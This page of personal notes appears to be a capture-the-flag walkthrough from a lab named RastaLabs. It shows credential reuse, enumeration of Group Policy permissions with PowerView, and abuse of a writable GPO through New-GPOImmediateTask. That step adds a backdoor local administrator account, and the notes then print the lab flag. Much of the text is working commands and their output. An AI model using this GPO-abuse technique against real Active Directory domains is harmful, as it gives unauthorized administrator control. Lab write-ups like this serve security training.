<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>11 flag</title>
</head><body><br/>
using epugh_adm creds, logged in to web01 (10.10.110.10) and from there took rdp of sql01(10.10.122.15) using same creds.<br/>
<br/>
Enumerated GPO, to find weak gpo permission<br/>
<br/>
Reference ---&gt; https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/<br/>
<br/>
using powerview.ps1<br/>
<br/>
Get-NetGPO | &nbsp;%{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | select IdentityReference -------&gt; gave list of all GPOs [ in that look for any weird groups or users ]<br/>
<br/>
<img src="screenshot.png" /><br/>
<br/>
checked the members of the group , epugh_adm is groupmember &nbsp; &nbsp;[ net user epugh_adm /domain ]<br/>
<br/>
find the sid of Infrastructure support group and then find which GPO it has permission to<br/>
<br/>
Get-NetGPO -ComputerName fs01.rastalabs.local | &nbsp;%{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | Where-Object { $_.IdentityReference -Eq "RLAB\Infrastructure support" }<br/>
<br/>
<br/>
<img src="screenshot 2.png" /><br/>
<br/>
<br/>
PS C:\Users\epugh_adm\Desktop&gt; Get-NetGPO &nbsp;| &nbsp;%{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | Where-Object { $_.IdentityReference -Eq "RLAB\Infrastructure support" }<br/>
<br/>
InheritedObjectType &nbsp; : All<br/>
ObjectDN &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: CN={DCE628BF-341C-4503-8181-3B8865700F6A},CN=Policies,CN=System,DC=rastalabs,DC=local<br/>
ObjectType &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: All<br/>
IdentityReference &nbsp; &nbsp; : RLAB\Infrastructure Support<br/>
IsInherited &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : False<br/>
ActiveDirectoryRights : CreateChild, DeleteChild, ReadProperty, WriteProperty, GenericExecute<br/>
PropagationFlags &nbsp; &nbsp; &nbsp;: None<br/>
ObjectFlags &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : None<br/>
InheritanceFlags &nbsp; &nbsp; &nbsp;: ContainerInherit<br/>
InheritanceType &nbsp; &nbsp; &nbsp; : All<br/>
AccessControlType &nbsp; &nbsp; : Allow<br/>
ObjectSID &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; :<br/>
<br/>
PS C:\Users\epugh_adm\Desktop&gt;<br/>
<br/>
<br/>
Get-NetOU -GUID "{DCE628BF-341C-4503-8181-3B8865700F6A}" | %{Get-NetComputer -ADSpath $_} &nbsp;- find out host which has this policy, use the GUID to find out<br/>
<br/>
&nbsp;Get-NetGPO -ComputerName fs01.rastalabs.local | Where-Object { $_.cn -Eq "{DCE628BF-341C-4503-8181-3B8865700F6A}"} - to find out which policy (policy name) in that particular host<br/>
<br/>
<br/>
<img src="screenshot 3.png" /><br/>
<br/>
<br/>
New-GPOImmediateTask -TaskName gop12i -GPODisplayName "Test GPO" -CommandArguments 'net user gopikrishna Ramco@12345 /add' -force<br/>
<br/>
New-GPOImmediateTask -TaskName gopi131 -GPODisplayName "Test GPO" -CommandArguments 'net localgroup Administrators gopikrishna /add' -force<br/>
<br/>
New-GPOImmediateTask -Remove -Force -GPODisplayName "Test GPO"<br/>
<br/>
icacls flag.txt /grant administrators:F<br/>
<br/>
RASTA{6p0_4bu53_15_h4rdc0r3}<br/>
<br/>
<br/>
<br/>
</body></html>